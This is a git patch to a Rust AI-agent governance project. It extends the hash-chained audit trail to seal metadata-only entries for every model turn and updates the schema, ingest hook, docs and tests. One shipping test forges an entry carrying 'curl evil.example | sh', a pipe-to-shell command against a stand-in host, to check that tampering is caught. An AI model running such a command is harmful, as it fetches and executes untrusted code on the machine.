From 604a15145420eba3ca4ad122e5d8392e53cca325 Mon Sep 17 00:00:00 2001 From: Roland Rodriguez Date: Sun, 30 Aug 2026 14:21:07 -0600 Subject: [PATCH] feat(audit): seal an entry for every attempted turn, not only tool calls A trail that recorded tool invocations alone could not answer the question an auditor actually asks. A session where the model read, reasoned, and answered in text left no line at all, so "this install did nothing that day" and "this install was busy and touched no tool" were the same silence. acton-ai 0.36.0 seals a turn entry per attempted turn. Garrison projects it into the same AuditEvent row the tool call uses: a `kind` of "turn", the turn outcome, and metadata only. Prompt and response byte counts, provider, model, and token counts answer the activity question without copying what a developer typed into a record that leaves the workstation. Admission is the gate that fills the columns the schema requires. A turn the gates admitted is `auto_approved` by `default`; a turn the model itself refused is `forbidden` by `policy`. Both are true statements about who decided, so the deployed schema did not have to be relaxed to accept the new kind. Nothing that was already written moved. The discriminator is absent on an invocation entry rather than set to a default, so entries a 1.0 daemon wrote hash to exactly what they hashed to; `kind()` reads that absence as "tool call". The new plane columns append after `detail` so the generated proto keeps its field numbers, which inserting mid-schema would have renumbered. The hook re-derives the turn columns from the sealed entry, as it already did for invocations, so an install cannot ship truthful evidence beside flattering metadata. One case is still not sealed: a turn Garrison's own admission gates refuse never reaches the model loop, and the audit writer's handle is not public, so there is nowhere to append it from. README says so plainly. Closes #28 Claude-Session: https://claude.ai/code/session_019QLkGsybQkgMocxu8eMsez --- Cargo.lock | 6 +- README.md | 12 +- agent/Cargo.toml | 2 +- agent/src/router.rs | 7 +- agent/tests/audit_fixture.rs | 40 +- agent/tests/session_persistence.rs | 19 +- docs/compatibility.md | 17 +- docs/control-plane.md | 33 +- hooks-service/proto/audit_event_hooks.proto | 12 + hooks-service/src/hooks/audit_event.rs | 200 ++++++- hooks-service/tests/audit_shipping.rs | 58 +- schemas/audit.schema | 47 +- wire/Cargo.toml | 2 +- wire/src/audit.rs | 618 +++++++++++++++++--- 14 files changed, 945 insertions(+), 128 deletions(-) diff --git a/Cargo.lock b/Cargo.lock index c9d2cc2..d564085 100644 --- a/Cargo.lock +++ b/Cargo.lock @@ -4,9 +4,9 @@ version = 4 [[package]] name = "acton-ai" -version = "0.35.0" +version = "0.36.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "cdbcb4ac30042cb345d82528804d732545e4521e20bb9a9cba803659e99ddfd7" +checksum = "77e3170bd3121159fdc4cddb9c31619c8a1d308dd0a58144d263eb9983c17abb" dependencies = [ "acton-ai-macros", "acton-reactive", @@ -714,7 +714,7 @@ dependencies = [ "bitflags 2.13.1", "cexpr", "clang-sys", - "itertools 0.12.1", + "itertools 0.13.0", "log", "prettyplease", "proc-macro2", diff --git a/README.md b/README.md index 8ac7a11..fcf62bc 100644 --- a/README.md +++ b/README.md @@ -221,11 +221,21 @@ offline behavior, revocation, and audit recovery before enrolling developers. ## The audit record is evidence with explicit limits -Every tool call is appended to a BLAKE3-chained JSONL trail. Strict durability +Every attempted turn and every tool call is appended to a BLAKE3-chained JSONL +trail. A turn is recorded whether or not it called anything, so a session where +the model answered in text and used no tool still leaves a record. Turn entries +carry metadata only — outcome, prompt and response byte counts, provider, +model, token counts — and never the prompt or the answer. Strict durability waits for the append to reach disk and refuses further non-idempotent work after an audit failure. An anchor stored outside the trail detects deletion of its tail, which the chain alone cannot detect. +One gap remains: a turn that Garrison's own admission gates refuse — a lapsed +seat, an unreachable plane, a full shipping backlog — is turned away before the +model loop is entered, and nothing appends it to the trail. Closing that gap +needs a public append path on the audit writer, which the agent runtime does +not expose yet. + ```sh garrison-agent audit verify ``` diff --git a/agent/Cargo.toml b/agent/Cargo.toml index f6de577..ef508bb 100644 --- a/agent/Cargo.toml +++ b/agent/Cargo.toml @@ -6,7 +6,7 @@ license.workspace = true repository.workspace = true [dependencies] -acton-ai = { version = "=0.35.0", default-features = false, features = ["fips", "sandbox-hardening", "derive", "otel", "ipc"] } +acton-ai = { version = "=0.36.0", default-features = false, features = ["fips", "sandbox-hardening", "derive", "otel", "ipc"] } acton-reactive = "9.2.1" acton-service-client = "0.1.2" agent-client-protocol-schema = "1.6.0" diff --git a/agent/src/router.rs b/agent/src/router.rs index 9ca17b3..df27e10 100644 --- a/agent/src/router.rs +++ b/agent/src/router.rs @@ -471,7 +471,12 @@ fn configure_handlers(builder: &mut ManagedActor) { next = actor.model.settle(Some(turn_id.clone())); arm_expiry(actor, next.is_some()); } - TurnLifecycle::TurnRefused => { + // The refused turn's id is not read here on purpose. A turn + // acton-ai never admitted holds no claim to release, so there is + // nothing to settle *on*; settling on `None` simply lets the next + // waiter through. The id matters to the trail, which seals it, + // not to the router. + TurnLifecycle::TurnRefused { .. } => { next = actor.model.settle(None); arm_expiry(actor, next.is_some()); } diff --git a/agent/tests/audit_fixture.rs b/agent/tests/audit_fixture.rs index a954221..8b03271 100644 --- a/agent/tests/audit_fixture.rs +++ b/agent/tests/audit_fixture.rs @@ -21,7 +21,8 @@ //! `regenerate_the_frozen_audit_fixture` in `audit.rs`, where the daemon //! harness lives. Only for a break that has been decided on. -use acton_ai::audit::{parse_entries, verify_chain, ChainBreakKind}; +use acton_ai::audit::{parse_entries, verify_chain, AuditEntryKind, ChainBreakKind}; +use garrison_wire::audit::kind; /// The trail as the daemon sealed it, byte for byte. const FIXTURE: &str = include_str!("fixtures/audit-1.0/audit.jsonl"); @@ -86,7 +87,7 @@ fn an_edited_argument_breaks_the_chain_where_it_was_edited() { let target = entries .get_mut(1) .expect("the fixture holds more than one entry"); - target.arguments = serde_json::json!({ "path": "/edited/after/the/fact" }); + target.arguments = Some(serde_json::json!({ "path": "/edited/after/the/fact" })); let broken = verify_chain(&entries).expect_err("an edited entry must not verify"); @@ -115,3 +116,38 @@ fn dropping_the_last_entry_is_not_detectable_from_the_chain_alone() { // hour was deleted. Only a copy the machine cannot reach can, by holding // a head this one no longer matches. See `garrison_agent::shipping`. } + +#[test] +fn every_entry_the_1_0_daemon_wrote_still_reads_as_a_tool_call() { + // 1.1 added turn entries, distinguished by a discriminator that + // invocation entries omit. Omission is what kept the promise above: a + // field present on these lines would have changed their bytes, and their + // bytes are their hashes. So the rule "an entry that names no kind is a + // tool call" is not a convenience, it is the compatibility guarantee, and + // it is asserted here against the trail a 1.0 daemon actually wrote. + let entries = parse_entries(FIXTURE).expect("the frozen trail still parses"); + + for entry in &entries { + assert!( + entry.entry_kind.is_none(), + "a 1.0 entry names no kind: sequence {}", + entry.sequence, + ); + assert_eq!(kind(entry), AuditEntryKind::Invocation); + assert!( + entry.tool_name.is_some(), + "a 1.0 entry is an invocation and names its tool: sequence {}", + entry.sequence, + ); + assert!( + entry.turn_outcome.is_none(), + "a 1.0 entry carries none of the turn fields: sequence {}", + entry.sequence, + ); + } + + assert!( + !FIXTURE.contains("entry_kind"), + "the discriminator must not appear in bytes written before it existed", + ); +} diff --git a/agent/tests/session_persistence.rs b/agent/tests/session_persistence.rs index f22b9c6..0976c2b 100644 --- a/agent/tests/session_persistence.rs +++ b/agent/tests/session_persistence.rs @@ -530,10 +530,23 @@ async fn a_conversation_survives_the_daemon_that_opened_it() { trail.contains(&chain_head), "the first daemon's head must still be in the chain the second extended", ); + // One tool call and one turn apiece. The turn entries are what make a + // prompt-only turn visible at all, so a count that only tallied tool calls + // would stop noticing if they ever went missing again. + let kinds: Vec = trail + .lines() + .map(|line| { + let entry: Value = serde_json::from_str(line).expect("every trail line is an entry"); + entry["entry_kind"] + .as_str() + .unwrap_or("invocation") + .to_string() + }) + .collect(); assert_eq!( - trail.lines().count(), - 2, - "one entry per tool call, across both daemons: {trail}", + kinds, + ["invocation", "turn", "invocation", "turn"], + "one tool call and one turn per daemon, in the order they happened: {trail}", ); drop(client); diff --git a/docs/compatibility.md b/docs/compatibility.md index 9459a0f..dfb85d0 100644 --- a/docs/compatibility.md +++ b/docs/compatibility.md @@ -77,6 +77,21 @@ holds a trail a real daemon wrote and fails if today's code disagrees with it about a single byte. Regenerating that fixture is the visible cost of breaking this promise, and it is deliberately awkward. +**Added in 1.1, without moving a byte:** the trail now also holds one entry per +attempted *turn*, not only per tool invocation. A turn entry is a new shape in +the same chain, distinguished by an `entry_kind` field that invocation entries +omit — and omission is the whole trick. Every field a turn entry adds, and the +discriminator itself, is absent from an invocation's serialized form and from +its hash pre-image, so a trail written by 1.0 still hashes to exactly what it +hashed to. `agent/tests/audit_fixture.rs` is what holds that claim honest: it +verifies a trail a 1.0 daemon wrote, unchanged. + +A reader that does not know about turn entries will still verify the chain, +because verification is over the sealed bytes. It will simply see entries whose +tool fields are absent. Code that reads those fields must treat them as +optional; in this repo, `garrison_wire::audit::kind` is the one place that +decides which kind an entry is, and an entry that names no kind is a tool call. + Note what the chain does *not* promise, and never did: a prefix of a valid chain is itself a valid chain, so truncation of the most recent entries is undetectable from the file alone. That is why the trail ships off the box. @@ -91,7 +106,7 @@ the next rebuild picks a change up silently. | Crate | Requirement | Why | | --- | --- | --- | -| `acton-ai` | `=0.35.0` (exact) | It is 0.x, and `garrison-wire` re-exports its audit types as Garrison's own wire contract. An unreviewed 0.36 would silently redefine what an audit entry is, which is surface 4 above. Exact makes the bump a reviewed commit. | +| `acton-ai` | `=0.36.0` (exact) | It is 0.x, and `garrison-wire` re-exports its audit types as Garrison's own wire contract. An unreviewed bump would silently redefine what an audit entry is, which is surface 4 above. Exact makes it a reviewed commit — as 0.35 → 0.36 was: it turned the tool fields optional to make room for turn entries, and the fixture test is what proved no existing byte moved. | | `acton-service` | `0.39` | Plane-side only (`hooks-service`). For a 0.x crate, caret already caps below 0.40, so caret and tilde are the same requirement here. | | `acton-service-client` | `0.1.2` | Ships inside the agent binary, so a fix here needs an agent release, not just a plane redeploy. | | `acton-reactive` | `9.2.1` | Post-1.0 semver, patch float. | diff --git a/docs/control-plane.md b/docs/control-plane.md index e1e3069..cdcfba2 100644 --- a/docs/control-plane.md +++ b/docs/control-plane.md @@ -891,7 +891,7 @@ cache buys availability, not integrity. | Schema | What it answers | |---|---| | `AuditTrail` | What the install says about its own trail: local head, shipped through | -| `AuditEvent` | One entry from an install's BLAKE3 chain, the sealed line verbatim | +| `AuditEvent` | One entry from an install's BLAKE3 chain — a turn or a tool call — the sealed line verbatim | | `AuditChain` | Where the plane has verified a trail's chain to, and whether it holds | The agent keeps a hash-chained JSONL trail locally; acton-ai seals every entry @@ -918,6 +918,37 @@ and may change; the verbatim entry may not. `session` is optional: a trail belongs to an install, and an entry can be sealed before any session is known to the plane. `trail` is required. +`kind` says which of two things an entry is, and the distinction matters more +than it looks. A `tool_call` row is one invocation: what ran, with what +arguments, decided by which gate. A `turn` row is one attempted model turn, +sealed whether or not that turn called anything. Without it the export answers +"what did this install run" and never "what did this install ask" — a session +where the model produced code and called no tool left no row at all, and a +compliance regime that specifies audit logging as *user activity* would have +been reading a trail that quietly only covered half of it. + +A `turn` row carries metadata and no content: `prompt_bytes`, +`response_bytes`, `input_tokens`, `output_tokens`, `provider`, and `model`. +The byte counts answer the user/timestamp/activity/response-length question +without copying a prompt or an answer into a trail that leaves the workstation +and lands in a SIEM. There is no column for prompt text; adding one would be a +decision about retention rather than about auditing, and it is not made here. + +`decision` and `decider` mean the approval gate on a `tool_call` row and the +*admission* gate on a `turn` row: a turn that ran was let through +(`auto_approved` / `default`) and a turn that did not was refused +(`forbidden` / `policy`), with the rendered reason in `justification`. +Admission is a gate in exactly the sense approval is, so a turn fills the same +columns rather than needing its own. A refused turn has no `outcome`, for the +same reason a denied call has none: it never ran. `sandboxed` is written +`false` on every turn row rather than inheriting the schema's `default(true)`, +because a turn confines nothing. + +The ingest hook re-derives every one of those columns, turn columns included. +An install that could set its own `kind` could file a turn as a tool call and +vanish from a turn-level export; one that could set its own token counts could +under-report what it spent. + `AuditChain` is the plane's answer, one per trail rather than one per session. Only the `audit_service` role writes it. The `before_validate` hook on `AuditEvent`, bound in `config.toml` with `required = true`, loads the chain diff --git a/hooks-service/proto/audit_event_hooks.proto b/hooks-service/proto/audit_event_hooks.proto index 7d0fca9..19b5e72 100644 --- a/hooks-service/proto/audit_event_hooks.proto +++ b/hooks-service/proto/audit_event_hooks.proto @@ -38,6 +38,12 @@ message AuditEventBeforeValidateRequest { optional string command_rule = 121; optional string tool_rule = 122; optional string detail = 123; + optional string provider = 124; + optional string model = 125; + optional int64 prompt_bytes = 126; + optional int64 response_bytes = 127; + optional int64 input_tokens = 128; + optional int64 output_tokens = 129; } message AuditEventBeforeValidateResponse { @@ -66,5 +72,11 @@ message AuditEventBeforeValidateResponse { optional string command_rule = 121; optional string tool_rule = 122; optional string detail = 123; + optional string provider = 124; + optional string model = 125; + optional int64 prompt_bytes = 126; + optional int64 response_bytes = 127; + optional int64 input_tokens = 128; + optional int64 output_tokens = 129; } diff --git a/hooks-service/src/hooks/audit_event.rs b/hooks-service/src/hooks/audit_event.rs index 184100b..46443c2 100644 --- a/hooks-service/src/hooks/audit_event.rs +++ b/hooks-service/src/hooks/audit_event.rs @@ -45,8 +45,9 @@ use std::collections::BTreeMap; use chrono::{SecondsFormat, Utc}; use garrison_wire::audit::{ - command_of, decider_of, decision_of, outcome_of, projection_disagreement, verify_next, - AuditEntry, ChainBreakKind, ChainHead, EventProjection, GENESIS_HASH, INGEST_UNAVAILABLE, + command_of, decider_of, decision_of, kind_column, outcome_of, projection_disagreement, + refusal_reason, truncate, verify_next, AuditEntry, ChainBreakKind, ChainHead, EventProjection, + GENESIS_HASH, INGEST_UNAVAILABLE, REASON_MAX, }; use serde_json::{json, Value}; use tonic::{Request, Response, Status}; @@ -243,42 +244,84 @@ pub fn verified_after(previous: Option<&AuditChainRow>, integrity: &str, head_se /// The columns the hook re-derives from the sealed entry rather than trusting. #[derive(Clone, Debug, PartialEq, Eq)] pub struct Derived { - /// Always `tool_call` for 1.0: acton-ai seals one entry per invocation. + /// What the entry is: `tool_call` for one invocation, `turn` for one + /// attempted model turn. Read from the entry's own discriminator, which + /// an invocation omits. pub kind: &'static str, - /// The tool the entry names. + /// The tool the entry names, empty on a turn. pub tool_name: String, /// The shell command, empty for every other tool. /// /// Empty rather than absent so a fabricated command is erased: an unset /// optional in the hook response leaves whatever the client sent. pub command: String, - /// How the call was decided. + /// How the call, or the turn, was decided. pub decision: &'static str, /// Which gate decided it. pub decider: &'static str, - /// What the call came to, absent for a call that never ran. + /// The rendered reason a refusal came with, empty when there was none. + /// + /// Empty for the same reason `command` is: an install that could write + /// this column freely could explain away its own refusals. + pub justification: String, + /// What it came to, absent for a call or a turn that never ran. pub outcome: Option<&'static str>, /// When it happened, as the entry recorded it. pub occurred_at: String, - /// How long it took. + /// How long it took. Zero on a turn, which records no duration. pub elapsed_ms: i64, + /// The provider billed for a turn, empty on a tool call. + pub provider: String, + /// The model a turn ran against, empty on a tool call. + pub model: String, + /// Prompt length in bytes, zero when the entry records none. + pub prompt_bytes: i64, + /// Response length in bytes, zero when the entry records none. + pub response_bytes: i64, + /// Input tokens summed across the turn. + pub input_tokens: i64, + /// Output tokens summed across the turn. + pub output_tokens: i64, } /// Re-derive every column that is a function of the sealed entry. Pure. +/// +/// Every field here is written back over whatever the client sent. The turn +/// columns are derived for the same reason the tool columns always were: an +/// install that could set its own token counts could under-report what it +/// spent, and one that could set `kind` could file a turn as a tool call and +/// disappear from a turn-level export. #[must_use] pub fn derive(entry: &AuditEntry) -> Derived { Derived { - kind: "tool_call", - tool_name: entry.tool_name.clone(), + kind: kind_column(entry), + tool_name: entry.tool_name.clone().unwrap_or_default(), command: command_of(entry).unwrap_or_default(), decision: decision_of(entry), - decider: decider_of(entry.decision), - outcome: outcome_of(&entry.outcome), + decider: decider_of(entry), + justification: refusal_reason(entry) + .map(|reason| truncate(reason, REASON_MAX)) + .unwrap_or_default(), + outcome: outcome_of(entry), occurred_at: entry.timestamp.clone(), - elapsed_ms: i64::try_from(entry.duration_ms).unwrap_or(i64::MAX), + elapsed_ms: count(entry.duration_ms), + provider: entry.provider.clone().unwrap_or_default(), + model: entry.model.clone().unwrap_or_default(), + prompt_bytes: count(entry.prompt_size_bytes), + response_bytes: count(entry.response_size_bytes), + input_tokens: count(entry.input_tokens), + output_tokens: count(entry.output_tokens), } } +/// One optional count as the column carries it. Pure. +/// +/// Absent becomes zero rather than being left unset, so a count the client +/// invented for an entry that records none is erased instead of surviving. +fn count(value: Option) -> i64 { + value.map_or(0, |value| i64::try_from(value).unwrap_or(i64::MAX)) +} + /// The one derived column the hook can refuse but cannot correct. Pure. /// /// `outcome` is an enum, so there is no value that means "nothing happened"; @@ -516,9 +559,16 @@ fn accept( command: Some(derived.command.clone()), decision: Some(derived.decision.to_string()), decider: Some(derived.decider.to_string()), + justification: Some(derived.justification.clone()), outcome: derived.outcome.map(ToString::to_string), occurred_at: Some(derived.occurred_at.clone()), elapsed_ms: Some(derived.elapsed_ms), + provider: Some(derived.provider.clone()), + model: Some(derived.model.clone()), + prompt_bytes: Some(derived.prompt_bytes), + response_bytes: Some(derived.response_bytes), + input_tokens: Some(derived.input_tokens), + output_tokens: Some(derived.output_tokens), ..Default::default() } } @@ -547,7 +597,9 @@ fn abort(reason: &str) -> AuditEventBeforeValidateResponse { #[cfg(test)] mod tests { use super::*; - use garrison_wire::audit::{fixture, AuditDecision, AuditOutcome, Decider, TrailId}; + use garrison_wire::audit::{ + fixture, AuditDecision, AuditOutcome, Decider, TrailId, TurnAuditOutcome, + }; /// A fresh trail identity. Reached through `garrison-wire`, like every /// other acton-ai type this crate touches: the hook service does not @@ -686,7 +738,7 @@ mod tests { let chain = chain_row(1, &entries[0].hash); // Edit the entry after sealing: the hash it carries is now a lie, and // the sequence check would otherwise have stopped before the hash one. - entries[4].tool_name = "rm".to_string(); + entries[4].tool_name = Some("rm".to_string()); let projection = projection_of(&entries[4], &trail.install); let verdict = adjudicate_entry(Some(&chain), None, &trail, &entries[4], &projection); @@ -935,6 +987,126 @@ mod tests { assert!(uncorrectable(&derived, Some("")).is_none()); } + #[test] + fn a_turn_entry_derives_a_turn_row_and_names_no_tool() { + let id = trail_id(); + let entry = fixture::turn(1, GENESIS_HASH, Some(&id), TurnAuditOutcome::Completed); + + let derived = derive(&entry); + + assert_eq!(derived.kind, "turn"); + assert_eq!(derived.tool_name, ""); + assert_eq!(derived.command, ""); + assert_eq!(derived.decision, "auto_approved"); + assert_eq!(derived.decider, "default"); + assert_eq!(derived.outcome, Some("success")); + assert_eq!(derived.provider, "anthropic"); + assert_eq!(derived.model, "claude-opus-5"); + assert_eq!(derived.prompt_bytes, 64); + assert_eq!(derived.response_bytes, 512); + assert_eq!(derived.input_tokens, 900); + assert_eq!(derived.output_tokens, 120); + } + + #[test] + fn a_refused_turn_derives_a_refusal_and_carries_its_reason() { + let id = trail_id(); + let entry = fixture::turn( + 1, + GENESIS_HASH, + Some(&id), + TurnAuditOutcome::Refused { + decision: "draining".into(), + reason: "the daemon is draining".into(), + }, + ); + + let derived = derive(&entry); + + assert_eq!(derived.decision, "forbidden"); + assert_eq!(derived.decider, "policy"); + assert_eq!(derived.justification, "the daemon is draining"); + assert_eq!(derived.outcome, None); + } + + #[test] + fn an_outcome_claimed_for_a_turn_that_never_ran_is_refused() { + // The same rule the denied tool call gets: a row saying a refused turn + // succeeded is claiming a provider round that was never paid for. + let id = trail_id(); + let entry = fixture::turn( + 1, + GENESIS_HASH, + Some(&id), + TurnAuditOutcome::Refused { + decision: "paused".into(), + reason: "admission is paused".into(), + }, + ); + let derived = derive(&entry); + + assert!(uncorrectable(&derived, Some("success")).is_some()); + assert!(uncorrectable(&derived, None).is_none()); + } + + #[test] + fn a_tool_call_derives_none_of_the_turn_columns() { + // Empty and zero rather than unset: an unset optional in the response + // leaves whatever the client sent, so an install could otherwise + // decorate a tool call with invented token counts. + let id = trail_id(); + let entries = fixture::chain(1, &id); + + let derived = derive(&entries[0]); + + assert_eq!(derived.kind, "tool_call"); + assert_eq!(derived.provider, ""); + assert_eq!(derived.model, ""); + assert_eq!(derived.prompt_bytes, 0); + assert_eq!(derived.input_tokens, 0); + assert_eq!(derived.output_tokens, 0); + assert_eq!(derived.justification, ""); + } + + #[test] + fn a_turn_row_overwrites_every_count_the_client_sent() { + let id = trail_id(); + let entry = fixture::turn(1, GENESIS_HASH, Some(&id), TurnAuditOutcome::Completed); + let trail = trail_row(&id); + + let response = accept(&trail, "operator_01", &derive(&entry)); + + assert_eq!(response.kind.as_deref(), Some("turn")); + assert_eq!(response.input_tokens, Some(900)); + assert_eq!(response.output_tokens, Some(120)); + assert_eq!(response.prompt_bytes, Some(64)); + assert_eq!(response.response_bytes, Some(512)); + assert_eq!(response.model.as_deref(), Some("claude-opus-5")); + } + + #[test] + fn a_turn_entry_adjudicates_on_the_chain_like_any_other() { + // Turn and invocation entries share one chain, so the ingest must + // link them together rather than treating a turn as an interloper. + let id = trail_id(); + let entries = fixture::mixed_chain(2, &id); + let trail = trail_row(&id); + let chain = chain_row(1, &entries[0].hash); + + let verdict = adjudicate_entry( + Some(&chain), + None, + &trail, + &entries[1], + &projection_of(&entries[1], &trail.install), + ); + + assert!( + matches!(&verdict, Verdict::Accept { head_seq, .. } if *head_seq == 2), + "{verdict:?}" + ); + } + #[test] fn an_update_is_refused_because_the_trail_is_append_only() { let response = abort(APPEND_ONLY); diff --git a/hooks-service/tests/audit_shipping.rs b/hooks-service/tests/audit_shipping.rs index ff44449..94fddf6 100644 --- a/hooks-service/tests/audit_shipping.rs +++ b/hooks-service/tests/audit_shipping.rs @@ -44,7 +44,9 @@ const ADMIN_USER: &str = "admin"; const ADMIN_PASSWORD: &str = "garrison-test-admin"; const ISSUER: &str = "garrison-control-plane"; const OPERATOR_UPN: &str = "shipper@example-agency.gov"; -const ENTRIES: u64 = 5; +/// Three turns, each with one tool call: a trail of both kinds, which is +/// the only shape that proves a prompt-only turn survives the trip too. +const ENTRIES: u64 = 6; /// A child process that dies with the test, whichever way the test ends. struct Reaped(Child, &'static str); @@ -531,7 +533,7 @@ async fn sealed_entries_ship_into_a_real_plane_and_the_chain_head_matches() { }; let trail_id = TrailId::new(); - let entries = fixture::chain(ENTRIES, &trail_id); + let entries = fixture::mixed_chain(ENTRIES / 2, &trail_id); let trail = daemon .create( "AuditTrail", @@ -604,7 +606,51 @@ async fn sealed_entries_ship_into_a_real_plane_and_the_chain_head_matches() { "the plane's head must be re-derivable from the plane's own rows" ); - // 4. Attribution came from the install, not from the daemon: the + // 4. Both kinds landed as themselves. A turn row carries the metadata + // that makes a prompt-only turn legible to an auditor, and none of the + // tool-call columns; a tool-call row is unchanged by any of this. + let mut by_kind: Vec<(&str, &Value)> = stored + .iter() + .map(|row| { + ( + row["fields"]["kind"] + .as_str() + .expect("every row names a kind"), + &row["fields"], + ) + }) + .collect(); + by_kind.sort_by_key(|(_, fields)| fields["chain_seq"].as_i64().expect("chain_seq")); + let turns: Vec<&&Value> = by_kind + .iter() + .filter(|(kind, _)| *kind == "turn") + .map(|(_, fields)| fields) + .collect(); + assert_eq!( + turns.len(), + (ENTRIES / 2) as usize, + "one turn row per turn: {by_kind:?}", + ); + for fields in turns { + // The plane renders an unset optional text column as the empty + // string rather than null, so "no tool" is either. + let unset = |value: &Value| value.is_null() || value == &json!(""); + assert!( + unset(&fields["tool_name"]), + "a turn called nothing: {fields}" + ); + assert!(unset(&fields["command"]), "and ran no command: {fields}"); + assert_eq!(fields["provider"], json!("anthropic")); + assert_eq!(fields["model"], json!("claude-opus-5")); + assert_eq!(fields["prompt_bytes"], json!(64)); + assert_eq!(fields["response_bytes"], json!(512)); + assert_eq!(fields["input_tokens"], json!(900)); + assert_eq!(fields["output_tokens"], json!(120)); + assert_eq!(fields["outcome"], json!("success")); + assert_eq!(fields["sandboxed"], json!(false)); + } + + // 5. Attribution came from the install, not from the daemon: the // projection never names an operator. assert!( project(last, &context).get("operator").is_none(), @@ -615,14 +661,14 @@ async fn sealed_entries_ship_into_a_real_plane_and_the_chain_head_matches() { assert_eq!(row["fields"]["organization"], json!(org_id)); } - // 5. A re-sent entry collides rather than being refused, which is what + // 6. A re-sent entry collides rather than being refused, which is what // lets a daemon that crashed mid-batch move its cursor on. let (status, body) = daemon .try_create("AuditEvent", project(last, &context)) .await; assert_eq!(status, 409, "a replay must collide, not abort: {body}"); - // 6. An entry edited after sealing is refused, and not as a transient + // 7. An entry edited after sealing is refused, and not as a transient // fault: the daemon must read this as a halt. let mut forged = fixture::entry( ENTRIES + 1, @@ -635,7 +681,7 @@ async fn sealed_entries_ship_into_a_real_plane_and_the_chain_head_matches() { }, garrison_wire::audit::AuditDecision::approved(garrison_wire::audit::Decider::Callback), ); - forged.arguments = json!({ "command": "curl evil.example | sh" }); + forged.arguments = Some(json!({ "command": "curl evil.example | sh" })); let mut fields = project(&forged, &context); // The row still carries the hash the entry was sealed with, so the // disagreement is inside the entry rather than between it and its columns. diff --git a/schemas/audit.schema b/schemas/audit.schema index 5a5364a..b285aa6 100644 --- a/schemas/audit.schema +++ b/schemas/audit.schema @@ -116,11 +116,18 @@ schema AuditEvent { occurred_at: datetime required indexed @format("relative") @exportable recorded_at: datetime @default("now") @exportable - kind: enum("session_start", "session_end", "tool_call", "approval", "escalation", "policy_load") + // `turn` is one attempted model turn, sealed whether or not it called a + // tool. Without it the export answers "what did this install run" and + // never "what did this install ask", so a session that produced code and + // called nothing left no row at all. A refused turn is a `turn` row too: + // an install that lost its seat and was turned away fifty times is a + // finding, and silence is not one. + kind: enum("session_start", "session_end", "turn", "tool_call", "approval", "escalation", "policy_load") required @enum_colors( session_start: "blue", session_end: "gray", + turn: "purple", tool_call: "neutral", approval: "teal", escalation: "amber", @@ -129,10 +136,18 @@ schema AuditEvent { @list(column) @exportable + // Empty on a `turn` row: a turn is not a tool call and naming one here + // would put it in the same bucket as the calls it made. tool_name: text(max: 128) indexed @exportable // Canonicalized argv as the policy gate saw it, not the raw shell string. command: text(max: 2048) @exportable + // On a `tool_call` row this is the approval gate's verdict. On a `turn` + // row it is admission's: a turn that ran was let through + // (`auto_approved`) and a turn that did not was refused (`forbidden`). + // Admission is a gate in exactly the sense approval is, so a turn fills + // the same column rather than needing one of its own — and `justification` + // carries the rendered reason a refusal came with. decision: enum("auto_approved", "approved", "denied", "forbidden", "timed_out") required @enum_colors( @@ -146,17 +161,23 @@ schema AuditEvent { @exportable // Which gate produced the verdict, and the identity behind it when a human - // was in the loop. + // was in the loop. Admission is never a person — nobody is prompted to let + // a turn start — so a refused turn reads `policy` and an admitted one + // reads `default`. decider: enum("policy", "callback", "operator", "default") required @exportable decided_by: text(max: 320) @exportable justification: text(max: 1024) @exportable + // Absent on a refused `tool_call` and on a refused `turn` alike: neither + // ran, and recording `error` for a refusal would file it beside a failure. outcome: enum("success", "error", "aborted") @enum_colors(success: "green", error: "red", aborted: "gray") @exportable + // False on every `turn` row. The daemon writes it explicitly rather than + // inheriting this default, because a turn confines nothing. sandboxed: boolean default(true) @exportable // Milliseconds, lifted from the entry's `duration_ms`. An integer rather // than a `duration` because the hook proto generator cannot carry a @@ -170,6 +191,28 @@ schema AuditEvent { // Free-form payload. Deliberately not @exportable: a bulk file is the // wrong place for whatever a tool happened to attach. detail: json + + // What a `turn` row adds, and only a `turn` row fills. + // + // Metadata, deliberately and permanently. Byte counts make user activity + // and response length auditable — which is the shape a compliance regime + // actually asks for — without copying a prompt or an answer into a trail + // that leaves the workstation and lands in a SIEM. There is no column here + // for prompt text, and adding one would be a decision about retention + // rather than about auditing. + // + // Appended after `detail` rather than filed beside the columns they read + // with, because the hook proto numbers its fields in declaration order: a + // field inserted in the middle renumbers every field after it, and a + // renumbered tag is a wire break for any plane still holding the old + // descriptor. + provider: text(max: 64) @exportable + model: text(max: 128) indexed @exportable + prompt_bytes: integer(min: 0) @exportable + // Also filled on a `tool_call` row, from the entry's serialized result. + response_bytes: integer(min: 0) @exportable + input_tokens: integer(min: 0) @exportable + output_tokens: integer(min: 0) @exportable } // Per-trail chain state as the plane verified it, maintained by the audit diff --git a/wire/Cargo.toml b/wire/Cargo.toml index 5608434..4f6cfdd 100644 --- a/wire/Cargo.toml +++ b/wire/Cargo.toml @@ -6,7 +6,7 @@ license.workspace = true repository.workspace = true [dependencies] -acton-ai = { version = "=0.35.0", default-features = false } +acton-ai = { version = "=0.36.0", default-features = false } base64 = "0.23.1" ed25519-dalek = { version = "3.0.0", features = ["pkcs8", "pem"] } serde = { version = "1.0.229", features = ["derive"] } diff --git a/wire/src/audit.rs b/wire/src/audit.rs index 6c27e7d..9e6def2 100644 --- a/wire/src/audit.rs +++ b/wire/src/audit.rs @@ -15,6 +15,22 @@ //! compares. Two implementations of that mapping would eventually differ, and //! the difference would read as tampering. //! +//! # Two kinds, one row shape +//! +//! A trail holds two kinds of entry: one per tool invocation, and one per +//! attempted model turn — sealed whether or not that turn called anything. +//! [`kind`] is the single place that decides which is which, and it answers +//! "invocation" for an entry that names no kind at all, because that is +//! exactly what every entry written before turns were recorded looks like. +//! Absence is the compatibility guarantee, not an oversight: a discriminator +//! present on those lines would have changed their bytes, and their bytes are +//! their hashes. +//! +//! The two kinds project into the same row, filling barely overlapping +//! columns. One table is what lets an auditor ask what an install did in a +//! window and get an answer that includes the turns where the model only +//! talked. +//! //! # What is not projected //! //! `operator` and `organization` are absent on purpose. An install must not @@ -22,12 +38,20 @@ //! `AgentInstall` row the trail belongs to, exactly as the enrollment hook //! fills `organization` on a redemption. A field the client cannot set is a //! field the client cannot forge. +//! +//! Prompt and response *content* is absent for a different reason: acton-ai +//! never seals it. A turn entry carries byte counts, which answer the +//! activity-and-response-length question a compliance regime actually asks, +//! without copying what a developer typed into a trail that leaves the +//! workstation and lands in a SIEM. // Re-exported rather than merely used: the ingest hook has to deserialize the // same sealed entry the daemon serialized, and a service that reached for // `acton_ai` itself would be a second, independently versioned 